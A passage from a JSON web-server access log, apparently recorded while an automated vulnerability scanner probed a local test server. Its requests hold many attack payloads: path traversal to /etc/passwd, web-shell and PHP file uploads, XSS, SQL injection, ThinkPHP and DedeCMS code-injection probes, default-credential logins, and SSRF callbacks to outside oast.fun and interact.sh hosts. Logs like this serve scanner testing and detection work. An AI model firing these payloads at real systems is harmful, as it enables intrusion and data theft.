HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.189","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openx/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"--------------------------aadc326f7ae3eac3\x0D\x0AContent-Disposition: form-data; name=\x22name\x22; filename=\x22../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/297MTs4EvVpYM4jDxNbA5t1t5lR.jsp\x22\x0D\x0AContent-Type: text/plain\x0D\x0A\x0D\x0A<%\x0D\x0Aout.println(\x22CVE-2022-26352\x22);\x0D\x0A%>\x0D\x0A--------------------------aadc326f7ae3eac3--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/content/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/UI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.197","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_inf.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.198","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /revive/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sqlite HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /confluence HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /297MTs4EvVpYM4jDxNbA5t1t5lR.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_pvt/service.cnf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.193","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php-fpm.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wiki HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?download=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pandora_console/attachment/pandora_chat.log.json.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-----------------------------20873900192357278038549710136\x0D\x0AContent-Disposition: form-data; name=\x22file1\x22; filename=\x22poc.aspx\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0A297MTlwyndxYmjecMSh5LZZC1iC\x0D\x0A-----------------------------20873900192357278038549710136--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /upload/UploadResourcePic.ashx?ResourceID=8382 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebInterface/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.192","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0AwmuUploadFiles\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22wmu_nonce\x22\x0D\x0A\x0D\x0A{{wmuSecurity}}\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22wmuAttachmentsData\x22\x0D\x0A\x0D\x0Aundefined\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22wmu_files[0]\x22; filename=\x22rce.php\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\xFF\xD8\xFF\xE1jExifMM*\xFD\xFD\xFDi\xFD\xFD>\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xA8\xFD\xFD\xFD\xFD\xC0\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFF\xE0\xFDJFIF\xFD\xFD\xFD\xFD\xFF\xDBC\xFD\xFD\x0C\xFD\x0C\x0A\xFD\xFD\x0D\x0A\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22postId\x22\x0D\x0A\x0D\x0A1\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.198","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sysmgmt/2015/bmc/session HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.193","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/bps-backup/logs/db_backup_log.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?s=index/think\x5Capp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?297MTx6JlOKwxgF27PwssjbmIPj=9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"cache.example.com"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Sitefinity/Authenticate/SWT HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/openstack/latest HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.882","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"action=login&username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.207","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"{\x22metadata\x22:{\x22order_id\x22:\x221 and updatexml(1,concat(0x7e,(SELECT md5(202072102)),0x7e),1)\x22},\x22status\x22:2}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/UI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/wp/v2/posts HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/wwwctrl.cgi?action=home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.181","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?297MTx6JlOKwxgF27PwssjbmIPj=9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?mp_idx=%22;alert(%271%27);// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /eam/vib?id=C:\x5CProgramData\x5CVMware\x5CvCenterServer\x5Ccfg\x5Cvmware-vpx\x5Cvcdb.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.184","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /shop/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.178","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db_dump.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1/user_add.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.181","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libs/cq/security/userinfo.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?qtproxycall=http://c9v8h8gsmpv8c1qg07h0x1akp8skoktzb.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", 